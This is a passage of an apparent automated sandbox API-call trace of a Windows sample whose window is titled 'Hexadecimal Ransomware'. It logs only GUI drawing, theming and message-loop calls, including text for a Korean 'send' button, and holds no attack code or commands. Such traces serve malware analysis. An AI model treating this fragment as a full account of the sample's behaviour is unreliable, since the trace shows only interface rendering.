0x0 [0239.729] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0239.729] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe7b4) returned 0x0 [0239.729] GdipSaveGraphics (graphics=0x6e19d80, state=0x11fe7e0) returned 0x0 [0239.729] GdipRestoreGraphics (graphics=0x6e19d80, state=0xfd870dbd) returned 0x0 [0239.729] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0239.730] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5cc) returned 0x0 [0239.730] GetCurrentObject (hdc=0x8501082e, type=0x1) returned 0xb00017 [0239.730] GetCurrentObject (hdc=0x8501082e, type=0x2) returned 0x900010 [0239.730] GetCurrentObject (hdc=0x8501082e, type=0x7) returned 0xb050815 [0239.730] GetCurrentObject (hdc=0x8501082e, type=0x6) returned 0x8a01c2 [0239.731] SaveDC (hdc=0x8501082e) returned 1 [0239.731] GetNearestColor (hdc=0x8501082e, color=0x0) returned 0x0 [0239.732] GetNearestColor (hdc=0x8501082e, color=0x0) returned 0x0 [0239.732] GetNearestColor (hdc=0x8501082e, color=0x0) returned 0x0 [0239.732] GetNearestColor (hdc=0x8501082e, color=0x989898) returned 0x989898 [0239.732] GetNearestColor (hdc=0x8501082e, color=0x0) returned 0x0 [0239.732] GetNearestColor (hdc=0x8501082e, color=0x7f7f7f) returned 0x7f7f7f [0239.732] GetNearestColor (hdc=0x8501082e, color=0x989898) returned 0x989898 [0239.732] GetNearestColor (hdc=0x8501082e, color=0x0) returned 0x0 [0239.732] GetNearestColor (hdc=0x8501082e, color=0x0) returned 0x0 [0239.732] RestoreDC (hdc=0x8501082e, nSavedDC=-1) returned 1 [0239.733] GdipReleaseDC (graphics=0x6e19d80, hdc=0x8501082e) returned 0x0 [0239.733] IsAppThemed () returned 0x1 [0239.733] GetThemeAppProperties () returned 0x3 [0239.733] GetThemeAppProperties () returned 0x3 [0239.734] IsAppThemed () returned 0x1 [0239.734] GetThemeAppProperties () returned 0x3 [0239.734] GetThemeAppProperties () returned 0x3 [0239.734] DrawTextExW (in: hdc=0x450107b6, lpchText="전송하기", cchText=4, lprc=0x11fe488, format=0x2415, lpdtp=0x33539dc | out: lpchText="전송하기", lprc=0x11fe488) returned 13 [0239.738] IsAppThemed () returned 0x1 [0239.738] GetThemeAppProperties () returned 0x3 [0239.738] GetThemeAppProperties () returned 0x3 [0239.738] IsAppThemed () returned 0x1 [0239.738] GetThemeAppProperties () returned 0x3 [0239.738] GetThemeAppProperties () returned 0x3 [0239.738] GetFocus () returned 0x102d8 [0239.738] IsAppThemed () returned 0x1 [0239.738] GetThemeAppProperties () returned 0x3 [0239.738] GetThemeAppProperties () returned 0x3 [0239.738] IsAppThemed () returned 0x1 [0239.738] GetThemeAppProperties () returned 0x3 [0239.738] GetThemeAppProperties () returned 0x3 [0239.738] IsThemePartDefined () returned 0x1 [0239.738] IsAppThemed () returned 0x1 [0239.739] GetThemeAppProperties () returned 0x3 [0239.739] GetThemeAppProperties () returned 0x3 [0239.739] IsThemeBackgroundPartiallyTransparent () returned 0x1 [0239.739] IsAppThemed () returned 0x1 [0239.739] GetThemeAppProperties () returned 0x3 [0239.739] GetThemeAppProperties () returned 0x3 [0239.739] IsAppThemed () returned 0x1 [0239.739] GetThemeAppProperties () returned 0x3 [0239.739] GetThemeAppProperties () returned 0x3 [0239.739] IsThemePartDefined () returned 0x1 [0239.739] GdipCreateRegion (region=0x11fe4d0) returned 0x0 [0239.739] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0239.739] GdipCreateMatrix (matrix=0x11fe4d0) returned 0x0 [0239.739] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a120) returned 0x0 [0239.739] GdipIsMatrixIdentity (matrix=0x6e1a120, result=0x11fe4e8) returned 0x0 [0239.739] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ed8 [0239.739] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ed8) returned 0x0 [0239.739] LocalFree (hMem=0x1593ed8) returned 0x0 [0239.740] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ed8 [0239.740] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ed8) returned 0x0 [0239.740] LocalFree (hMem=0x1593ed8) returned 0x0 [0239.740] GdipDeleteMatrix (matrix=0x6e1a120) returned 0x0 [0239.740] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe510) returned 0x0 [0239.740] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe500) returned 0x0 [0239.740] GdipGetRegionHRgn (region=0x6e1a090, graphics=0x6e19d80, hRgn=0x11fe500) returned 0x0 [0239.740] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0239.740] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe518) returned 0x0 [0239.740] GetCurrentObject (hdc=0x8501082e, type=0x1) returned 0xb00017 [0239.740] GetCurrentObject (hdc=0x8501082e, type=0x2) returned 0x900010 [0239.740] GetCurrentObject (hdc=0x8501082e, type=0x7) returned 0xb050815 [0239.740] GetCurrentObject (hdc=0x8501082e, type=0x6) returned 0x8a01c2 [0239.740] SaveDC (hdc=0x8501082e) returned 1 [0239.740] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2f04081c [0239.740] GetClipRgn (hdc=0x8501082e, hrgn=0x2f04081c) returned 0 [0239.741] SelectClipRgn (hdc=0x8501082e, hrgn=0x43040825) returned 2 [0239.741] DeleteObject (ho=0x2f04081c) returned 1 [0239.741] DeleteObject (ho=0x43040825) returned 1 [0239.741] OffsetViewportOrgEx (in: hdc=0x8501082e, x=0, y=0, lppt=0x335408c | out: lppt=0x335408c) returned 1 [0239.741] DrawThemeParentBackground () returned 0x0 [0239.741] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe1dc | out: lpwndpl=0x11fe1dc) returned 1 [0239.741] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe188 | out: lpRect=0x11fe188) returned 1 [0239.741] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0239.741] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0239.741] GetSystemMetrics (nIndex=42) returned 0 [0239.741] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe030, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0239.741] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe030) returned 0x16 [0239.741] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe090 | out: lpRect=0x11fe090) returned 1 [0239.741] GetCurrentObject (hdc=0x8501082e, type=0x1) returned 0xb00017 [0239.741] GetCurrentObject (hdc=0x8501082e, type=0x2) returned 0x900010 [0239.742] GetCurrentObject (hdc=0x8501082e, type=0x7) returned 0xb050815 [0239.742] GetCurrentObject (hdc=0x8501082e, type=0x6) returned 0x8a01c2 [0239.742] SaveDC (hdc=0x8501082e) returned 2 [0239.742] GetNearestColor (hdc=0x8501082e, color=0x0) returned 0x0 [0239.742] CreateSolidBrush (color=0x0) returned 0x29100826 [0239.742] FillRect (hDC=0x8501082e, lprc=0x11fdf30, hbr=0x29100826) returned 1 [0239.742] DeleteObject (ho=0x29100826) returned 1 [0239.742] RestoreDC (hdc=0x8501082e, nSavedDC=-1) returned 1 [0239.743] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0239.743] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0239.743] GetSystemMetrics (nIndex=42) returned 0 [0239.743] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0239.743] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0239.743] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe030 | out: lpRect=0x11fe030) returned 1 [0239.743] GetCurrentObject (hdc=0x8501082e, type=0x1) returned 0xb00017 [0239.743] GetCurrentObject (hdc=0x8501082e, type=0x2) returned 0x900010 [0239.743] GetCurrentObject (hdc=0x8501082e, type=0x7) returned 0xb050815 [0239.743] GetCurrentObject (hdc=0x8501082e, type=0x6) returned 0x8a01c2 [0239.743] SaveDC (hdc=0x8501082e) returned 2 [0239.743] GetNearestColor (hdc=0x8501082e, color=0x0) returned 0x0 [0239.743] CreateSolidBrush (color=0x0) returned 0x2a100826 [0239.744] FillRect (hDC=0x8501082e, lprc=0x11fded0, hbr=0x2a100826) returned 1 [0239.744] DeleteObject (ho=0x2a100826) returned 1 [0239.744] RestoreDC (hdc=0x8501082e, nSavedDC=-1) returned 1 [0239.744] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0239.744] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0239.744] GetSystemMetrics (nIndex=42) returned 0 [0239.744] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0239.744] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0239.744] RestoreDC (hdc=0x8501082e, nSavedDC=-1) returned 1 [0239.744] GdipReleaseDC (graphics=0x6e19d80, hdc=0x8501082e) returned 0x0 [0239.744] IsAppThemed () returned 0x1 [0239.744] GetThemeAppProperties () returned 0x3 [0239.744] GetThemeAppProperties () returned 0x3 [0239.744] IsAppThemed () returned 0x1 [0239.744] GetThemeAppProperties () returned 0x3 [0239.744] GetThemeAppProperties () returned 0x3 [0239.744] IsThemePartDefined () returned 0x1 [0239.744] GdipCreateRegion (region=0x11fe454) returned 0x0 [0239.744] GdipGetClip (graphics=0x6e19d80, region=0x6e1a060) returned 0x0 [0239.745] GdipCreateMatrix (matrix=0x11fe454) returned 0x0 [0239.745] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a0f0) returned 0x0 [0239.745] GdipIsMatrixIdentity (matrix=0x6e1a0f0, result=0x11fe46c) returned 0x0 [0239.745] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0239.745] GdipGetMatrixElements (matrix=0x6e1a0f0, matrixOut=0x1593ae8) returned 0x0 [0239.745] LocalFree (hMem=0x1593ae8) returned 0x0 [0239.745] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0239.745] GdipGetMatrixElements (matrix=0x6e1a0f0, matrixOut=0x1593ae8) returned 0x0 [0239.745] LocalFree (hMem=0x1593ae8) returned 0x0 [0239.745] GdipDeleteMatrix (matrix=0x6e1a0f0) returned 0x0 [0239.745] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe494) returned 0x0 [0239.745] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe484) returned 0x0 [0239.745] GdipGetRegionHRgn (region=0x6e1a060, graphics=0x6e19d80, hRgn=0x11fe484) returned 0x0 [0239.745] GdipDeleteRegion (region=0x6e1a060) returned 0x0 [0239.745] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe49c) returned 0x0 [0239.745] GetCurrentObject (hdc=0x8501082e, type=0x1) returned 0xb00017 [0239.745] GetCurrentObject (hdc=0x8501082e, type=0x2) returned 0x900010 [0239.745] GetCurrentObject (hdc=0x8501082e, type=0x7) returned 0xb050815 [0239.745] GetCurrentObject (hdc=0x8501082e, type=0x6) returned 0x8a01c2 [0239.745] SaveDC (hdc=0x8501082e) returned 1 [0239.746] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x44040825 [0239.746] GetClipRgn (hdc=0x8501082e, hrgn=0x44040825) returned 0 [0239.746] SelectClipRgn (hdc=0x8501082e, hrgn=0x3104081c) returned 2 [0239.746] DeleteObject (ho=0x44040825) returned 1 [0239.746] DeleteObject (ho=0x3104081c) returned 1 [0239.746] OffsetViewportOrgEx (in: hdc=0x8501082e, x=0, y=0, lppt=0x3354a4c | out: lppt=0x3354a4c) returned 1 [0239.746] IsAppThemed () returned 0x1 [0239.746] GetThemeAppProperties () returned 0x3 [0239.746] GetThemeAppProperties () returned 0x3 [0239.746] DrawThemeBackground () returned 0x0 [0239.746] RestoreDC (hdc=0x8501082e, nSavedDC=-1) returned 1 [0239.746] GdipReleaseDC (graphics=0x6e19d80, hdc=0x8501082e) returned 0x0 [0239.746] GdipCreateRegion (region=0x11fe458) returned 0x0 [0239.747] GdipGetClip (graphics=0x6e19d80, region=0x6e1a060) returned 0x0 [0239.747] GdipCreateMatrix (matrix=0x11fe458) returned 0x0 [0239.747] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a120) returned 0x0 [0239.747] GdipIsMatrixIdentity (matrix=0x6e1a120, result=0x11fe470) returned 0x0 [0239.747] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0239.747] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593c38) returned 0x0 [0239.747] LocalFree (hMem=0x1593c38) returned 0x0 [0239.747] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ed8 [0239.747] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ed8) returned 0x0 [0239.747] LocalFree (hMem=0x1593ed8) returned 0x0 [0239.747] GdipDeleteMatrix (matrix=0x6e1a120) returned 0x0 [0239.747] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe498) returned 0x0 [0239.747] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe488) returned 0x0 [0239.747] GdipGetRegionHRgn (region=0x6e1a060, graphics=0x6e19d80, hRgn=0x11fe488) returned 0x0 [0239.747] GdipDeleteRegion (region=0x6e1a060) returned 0x0 [0239.747] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe4a0) returned 0x0 [0239.747] GetCurrentObject (hdc=0x8501082e, type=0x1) returned 0xb00017 [0239.747] GetCurrentObject (hdc=0x8501082e, type=0x2) returned 0x900010 [0239.747] GetCurrentObject (hdc=0x8501082e, type=0x7) returned 0xb050815 [0239.747] GetCurrentObject (hdc=0x8501082e, type=0x6) returned 0x8a01c2 [0239.748] SaveDC (hdc=0x8501082e) returned 1 [0239.748] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3204081c [0239.748] GetClipRgn (hdc=0x8501082e, hrgn=0x3204081c) returned 0 [0239.748] SelectClipRgn (hdc=0x8501082e, hrgn=0x45040825) returned 2 [0239.748] DeleteObject (ho=0x3204081c) returned 1 [0239.748] DeleteObject (ho=0x45040825) returned 1 [0239.748] OffsetViewportOrgEx (in: hdc=0x8501082e, x=0, y=0, lppt=0x3354d20 | out: lppt=0x3354d20) returned 1 [0239.748] IsAppThemed () returned 0x1 [0239.748] GetThemeAppProperties () returned 0x3 [0239.748] GetThemeAppProperties () returned 0x3 [0239.748] GetThemeBackgroundContentRect () returned 0x0 [0239.748] RestoreDC (hdc=0x8501082e, nSavedDC=-1) returned 1 [0239.748] GdipReleaseDC (graphics=0x6e19d80, hdc=0x8501082e) returned 0x0 [0239.748] IsAppThemed () returned 0x1 [0239.748] GetThemeAppProperties () returned 0x3 [0239.748] GetThemeAppProperties () returned 0x3 [0239.749] GdipGetTextRenderingHint (graphics=0x6e19d80, mode=0x11fe5d4) returned 0x0 [0239.749] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5c0) returned 0x0 [0239.749] GetCurrentObject (hdc=0x8501082e, type=0x1) returned 0xb00017 [0239.749] GetCurrentObject (hdc=0x8501082e, type=0x2) returned 0x900010 [0239.749] GetCurrentObject (hdc=0x8501082e, type=0x7) returned 0xb050815 [0239.749] GetCurrentObject (hdc=0x8501082e, type=0x6) returned 0x8a01c2 [0239.749] SaveDC (hdc=0x8501082e) returned 1 [0239.749] GetTextAlign (hdc=0x8501082e) returned 0x0 [0239.749] GetTextColor (hdc=0x8501082e) returned 0x0 [0239.749] GetCurrentObject (hdc=0x8501082e, type=0x6) returned 0x8a01c2 [0239.749] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe308 | out: pv=0x11fe308) returned 92 [0239.750] SelectObject (hdc=0x8501082e, h=0x170a07ff) returned 0x8a01c2 [0239.750] GetBkMode (hdc=0x8501082e) returned 2 [0239.750] SetBkMode (hdc=0x8501082e, mode=1) returned 2 [0239.750] DrawTextExW (in: hdc=0x8501082e, lpchText="전송하기", cchText=4, lprc=0x11fe3f0, format=0x2415, lpdtp=0x33550c0 | out: lpchText="전송하기", lprc=0x11fe3f0) returned 13 [0239.751] DrawTextExW (in: hdc=0x8501082e, lpchText="전송하기", cchText=4, lprc=0x11fe554, format=0x2015, lpdtp=0x33550c0 | out: lpchText="전송하기", lprc=0x11fe554) returned 13 [0239.753] RestoreDC (hdc=0x8501082e, nSavedDC=-1) returned 1 [0239.753] GdipReleaseDC (graphics=0x6e19d80, hdc=0x8501082e) returned 0x0 [0239.753] GetFocus () returned 0x102d8 [0239.753] IsAppThemed () returned 0x1 [0239.753] GetThemeAppProperties () returned 0x3 [0239.753] GetThemeAppProperties () returned 0x3 [0239.753] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe7a0) returned 0x0 [0239.753] BitBlt (hdc=0x60100ce, x=0, y=0, cx=64, cy=25, hdcSrc=0x8501082e, x1=0, y1=0, rop=0xcc0020) returned 1 [0239.754] GdipReleaseDC (graphics=0x6e19d80, hdc=0x8501082e) returned 0x0 [0239.754] SelectPalette (hdc=0x60100ce, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0239.754] SelectObject (hdc=0x8501082e, h=0x85000f) returned 0xb050815 [0239.754] DeleteDC (hdc=0x8501082e) returned 1 [0239.754] GdipDeleteGraphics (graphics=0x6e19d80) returned 0x0 [0239.754] EndPaint (hWnd=0x102d8, lpPaint=0x11fe744) returned 1 [0239.754] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0239.754] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0239.754] WaitMessage () returned 1 [0239.784] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.784] IsWindowUnicode (hWnd=0x202e6) returned 1 [0239.784] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.784] TranslateMessage (lpMsg=0x11fed00) returned 0 [0239.784] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0239.786] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0239.786] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0239.786] WaitMessage () returned 1 [0239.789] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.789] IsWindowUnicode (hWnd=0x202e6) returned 1 [0239.789] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.789] TranslateMessage (lpMsg=0x11fed00) returned 0 [0239.789] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0239.795] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0239.795] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0239.795] WaitMessage () returned 1 [0239.818] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.819] GetMessageA (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.819] TranslateMessage (lpMsg=0x11fed00) returned 0 [0239.819] DispatchMessageA (lpMsg=0x11fed00) returned 0x0 [0239.819] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0239.819] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0239.819] WaitMessage () returned 1 [0239.979] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.980] IsWindowUnicode (hWnd=0x202e6) returned 1 [0239.980] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.980] TranslateMessage (lpMsg=0x11fed00) returned 0 [0239.980] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0239.983] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.983] IsWindowUnicode (hWnd=0x202e6) returned 1 [0239.983] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.983] TranslateMessage (lpMsg=0x11fed00) returned 0 [0239.983] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0239.984] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.984] IsWindowUnicode (hWnd=0x202e6) returned 1 [0239.984] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.984] TranslateMessage (lpMsg=0x11fed00) returned 0 [0239.984] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0239.984] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0239.985] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0239.985] WaitMessage () returned 1 [0239.985] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.985] IsWindowUnicode (hWnd=0x202e6) returned 1 [0239.986] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.986] TranslateMessage (lpMsg=0x11fed00) returned 0 [0239.986] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0239.988] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.988] IsWindowUnicode (hWnd=0x202e6) returned 1 [0239.988] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.988] TranslateMessage (lpMsg=0x11fed00) returned 0 [0239.988] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0239.989] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.989] IsWindowUnicode (hWnd=0x202e6) returned 1 [0239.989] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.989] TranslateMessage (lpMsg=0x11fed00) returned 0 [0239.989] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0239.989] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0239.990] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0239.990] WaitMessage () returned 1 [0240.022] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0240.022] IsWindowUnicode (hWnd=0x102ea) returned 1 [0240.022] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0240.022] TranslateMessage (lpMsg=0x11fed00) returned 0 [0240.022] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0240.022] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0240.022] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0240.023] WaitMessage () returned 1 [0244.793] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0244.794] IsWindowUnicode (hWnd=0x102d8) returned 1 [0244.794] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0244.796] GetKeyState (nVirtKey=16) returned 0 [0244.796] GetKeyState (nVirtKey=17) returned 0 [0244.796] GetKeyState (nVirtKey=18) returned -127 [0244.796] SendMessageW (hWnd=0x102d8, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x1 [0244.796] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x1 [0244.797] GetKeyState (nVirtKey=16) returned 0 [0244.797] GetKeyState (nVirtKey=17) returned 0 [0244.797] GetKeyState (nVirtKey=18) returned -127 [0244.801] TranslateMessage (lpMsg=0x11fed00) returned 1 [0244.801] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0244.801] GetKeyState (nVirtKey=16) returned 0 [0244.801] GetKeyState (nVirtKey=17) returned 0 [0244.801] GetKeyState (nVirtKey=18) returned -127 [0244.801] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x104, wParam=0x12, lParam=0x20380001) returned 0x0 [0244.802] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0244.802] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x1f, wParam=0x0, lParam=0x0) returned 0x0 [0244.835] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0244.838] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe900 | out: lpwndpl=0x11fe900) returned 1 [0244.839] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x47, wParam=0x0, lParam=0x11febd4) returned 0x0 [0244.839] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0244.839] GetWindowRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0244.852] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0244.863] NtdllDefWindowProc_W (hWnd=0x202c6, Msg=0x1c, wParam=0x0, lParam=0xf70) returned 0x0 [0244.863] 